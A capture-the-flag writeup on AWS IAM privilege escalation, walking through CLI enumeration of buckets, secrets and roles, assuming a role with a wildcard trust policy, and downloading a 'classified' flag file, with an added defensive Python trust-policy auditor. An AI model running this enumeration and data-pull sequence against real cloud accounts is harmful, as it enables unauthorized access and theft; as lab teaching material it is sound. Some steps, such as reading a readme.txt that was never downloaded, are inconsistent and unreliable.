Trust Issues CTF Writeup: AWS IAM Privilege Escalation

Barely Tame CTF Player. Debugging Addict. Worshipper of Wi-Fi Signals. Human? Depends on the Ping.
Challenge Description
Category: Miscellaneous
Author: qvipin
KRAMPUS SYNDICATE managed to get one of their operatives hired as an external contractor at NPLD's cloud infrastructure team. They've been given minimal access, but NPLD's IAM policies are... not great.
Escalate your privileges and find the classified data.
Endpoint: https://trust-issues.csd.lol
Region: us-east-1
Credentials: test / test
Starting Role: npld-ext-2847
Note: Environment resets every 10 minutes.
Solution Walkthrough
Environment Configuration
The initial step requires configuring the AWS CLI to interact with the challenge endpoint. Since the provided credentials are test / test, we set the local profile to use these placeholders and target the us-east-1 region.
❯ aws configure set aws_access_key_id test && \
aws configure set aws_secret_access_key test && \
aws configure set region us-east-1
Identity Verification
To confirm the current execution context and ensure connectivity to the simulated AWS environment, we use the sts get-caller-identity command.
❯ aws --endpoint-url https://trust-issues.csd.lol sts get-caller-identity
{
"UserId": "AKIAIOSFODNN7EXAMPLE",
"Account": "000000000000",
"Arn": "arn:aws:iam::000000000000:root"
}
The output confirms we are operating within the target account 000000000000; in this simulated environment the placeholder credentials resolve to the account root principal.
Initial Resource Enumeration
We perform a broad sweep of available services to identify potential targets. First, we list S3 buckets to locate storage areas for classified data.
❯ aws --endpoint-url https://trust-issues.csd.lol s3 ls
2025-12-20 05:22:17 npld-backup-vault-7f3a
2025-12-20 05:22:19 npld-public-assets
2025-12-20 05:22:20 npld-logs-archive
2025-12-20 05:22:21 elf-hr-documents
Next, we check Secrets Manager for any sensitive configuration strings or API keys.
❯ aws --endpoint-url https://trust-issues.csd.lol secretsmanager list-secrets
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:000000000000:secret:/npld/config/backup-vault-DeHMYk",
"Name": "/npld/config/backup-vault",
"Description": "Backup vault config",
.... SNIP ....
},
{
"ARN": "arn:aws:secretsmanager:us-east-1:000000000000:secret:/npld/config/database-sdTWSb",
"Name": "/npld/config/database",
.... SNIP ....
},
{
"ARN": "arn:aws:secretsmanager:us-east-1:000000000000:secret:/npld/api/external-ehrotR",
"Name": "/npld/api/external",
.... SNIP ....
}
]
}
IAM Role Analysis
To determine the path for privilege escalation, we list the available IAM roles and inspect their Trust Relationships (AssumeRolePolicyDocument).
❯ aws --endpoint-url https://trust-issues.csd.lol iam list-roles
{
"Roles": [
.... SNIP ....
{
"Path": "/",
"RoleName": "npld-ext-2847",
"RoleId": "AROAQAAAAAAAOUQAG67KA",
"Arn": "arn:aws:iam::000000000000:role/npld-ext-2847",
"CreateDate": "2025-12-19T23:52:27.501059+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
}
]
}
The output shows that the npld-ext-2847 role (the last one listed) has a wildcard principal ("AWS": "*") in its trust policy, so any principal can assume it. Furthermore, several other roles (snipped above) specifically trust npld-ext-2847 for sts:AssumeRole, which makes it the starting point for role chaining.
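As an added example (not part of the original writeup), the following Python audits the trust policies that iam list-roles returns: it flags roles with an unconditioned wildcard principal and maps which roles can be reached from a given role by chaining sts:AssumeRole. The sample input is constructed to mirror the challenge output; npld-backup-admin and npld-hardened are hypothetical roles, the latter showing a trust policy scoped to a named principal with an sts:ExternalId condition.

```python
import json
from collections import deque

# Constructed sample in the shape of `aws iam list-roles` output. The first role
# copies the challenge's npld-ext-2847 trust policy; the other two are hypothetical:
# one that trusts the contractor role, one with a hardened trust policy.
ACCT = "arn:aws:iam::000000000000:"
SAMPLE_LIST_ROLES = json.dumps({"Roles": [
    {"RoleName": "npld-ext-2847", "Arn": ACCT + "role/npld-ext-2847",
     "AssumeRolePolicyDocument": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "sts:AssumeRole"}]}},
    {"RoleName": "npld-backup-admin", "Arn": ACCT + "role/npld-backup-admin",
     "AssumeRolePolicyDocument": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": "sts:AssumeRole",
          "Principal": {"AWS": ACCT + "role/npld-ext-2847"}}]}},
    {"RoleName": "npld-hardened", "Arn": ACCT + "role/npld-hardened",
     "AssumeRolePolicyDocument": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": "sts:AssumeRole",
          "Principal": {"AWS": ACCT + "user/backup-operator"},  # named principal
          "Condition": {"StringEquals": {"sts:ExternalId": "EXAMPLE-ID"}}}]}},
]})

def _as_list(v):
    return v if isinstance(v, list) else [v]

def audit_trust_policies(list_roles_json):
    """Return (wildcard_roles, edges): role names anyone may assume, and trusted role ARN -> assumable role ARNs."""
    roles = json.loads(list_roles_json)["Roles"]
    known = {r["Arn"] for r in roles}
    wildcard, edges = [], {}
    for r in roles:
        for s in r["AssumeRolePolicyDocument"]["Statement"]:
            actions = {a.lower() for a in _as_list(s.get("Action", []))}
            if s.get("Effect") != "Allow" or not actions & {"sts:assumerole", "sts:*", "*"}:
                continue
            p = s.get("Principal", {})  # either "*" or {"AWS": [...], "Service": [...]}
            for principal in (["*"] if p == "*" else [x for v in p.values() for x in _as_list(v)]):
                if principal == "*" and "Condition" not in s:  # unconditioned wildcard: anyone
                    wildcard.append(r["RoleName"])
                elif principal in known:  # another role in the account can chain into it
                    edges.setdefault(principal, []).append(r["Arn"])
    return wildcard, edges

def reachable_roles(edges, start_arn):
    """Every role ARN reachable from start_arn by repeated sts:AssumeRole (BFS)."""
    seen, queue = [], deque([start_arn])
    while queue:
        for nxt in edges.get(queue.popleft(), []):
            if nxt not in seen:
                seen.append(nxt); queue.append(nxt)
    return seen
```

Feeding real `aws iam list-roles` output to audit_trust_policies gives the same two findings for an account under review: roles anyone can assume, and the chaining graph behind them.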
Assuming the Entry Point Role
Based on the challenge description, we must first assume our assigned role npld-ext-2847 to gain the permissions associated with the external contractor identity.
❯ aws --endpoint-url https://trust-issues.csd.lol sts assume-role \
--role-arn arn:aws:iam::000000000000:role/npld-ext-2847 \
--role-session-name 1-Contractor
{
"Credentials": {
"AccessKeyId": "LSIAQAAAAAAAMPL4XQVI",
"SecretAccessKey": "gJ9wnEBe8/Z0/1t3HOZvG6YxAzRuN3P9FsNl1Vkl",
"SessionToken": "FQoGZXIvYXdzEB ...SNIP... TjAG0gucqcpo2vt2ow31Li9uuO+g=",
"Expiration": "2025-12-20T02:12:49.687000+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROAQAAAAAAAOUQAG67KA:1-Contractor",
"Arn": "arn:aws:sts::000000000000:assumed-role/npld-ext-2847/1-Contractor"
},
"PackedPolicySize": 6
}
We then export the returned temporary credentials to our environment to authenticate subsequent requests.
❯ export AWS_ACCESS_KEY_ID="LSIAQAAAAAAAMPL4XQVI"
❯ export AWS_SECRET_ACCESS_KEY="gJ9wnEBe8/Z0/1t3HOZvG6YxAzRuN3P9FsNl1Vkl"
❯ export AWS_SESSION_TOKEN="FQoGZXIvYXdzEB ...SNIP... TjAG0gucqcpo2vt2ow31Li9uuO+g="
Data Exfiltration
With the permissions of the npld-ext-2847 role, we attempt to access the previously discovered S3 buckets. The npld-backup-vault-7f3a bucket appears to be a high-value target.
❯ aws --endpoint-url https://trust-issues.csd.lol s3 ls s3://npld-backup-vault-7f3a/
PRE classified/
2025-12-20 05:22:24 13 readme.txt
A classified/ directory exists within the bucket. We enumerate its contents to find the backup files.
❯ aws --endpoint-url https://trust-issues.csd.lol s3 ls s3://npld-backup-vault-7f3a/classified/
2025-12-20 05:22:22 53 wishlist-backup.txt
We proceed to download wishlist-backup.txt, as its name suggests it contains sensitive information stored by the Syndicate's target.
❯ aws --endpoint-url https://trust-issues.csd.lol s3 cp s3://npld-backup-vault-7f3a/classified/wishlist-backup.txt .
download: s3://npld-backup-vault-7f3a/classified/wishlist-backup.txt to ./wishlist-backup.txt
Finally, we inspect the file contents: readme.txt is a decoy, and wishlist-backup.txt holds the flag.
❯ cat readme.txt
Nothing here
❯ cat wishlist-backup.txt
csd{sO_M4NY_VUln3R48L3_7H1Ngs_7H3S3_d4yS_s1gh_bc653}
Final Flag
csd{sO_M4NY_VUln3R48L3_7H1Ngs_7H3S3_d4yS_s1gh_bc653}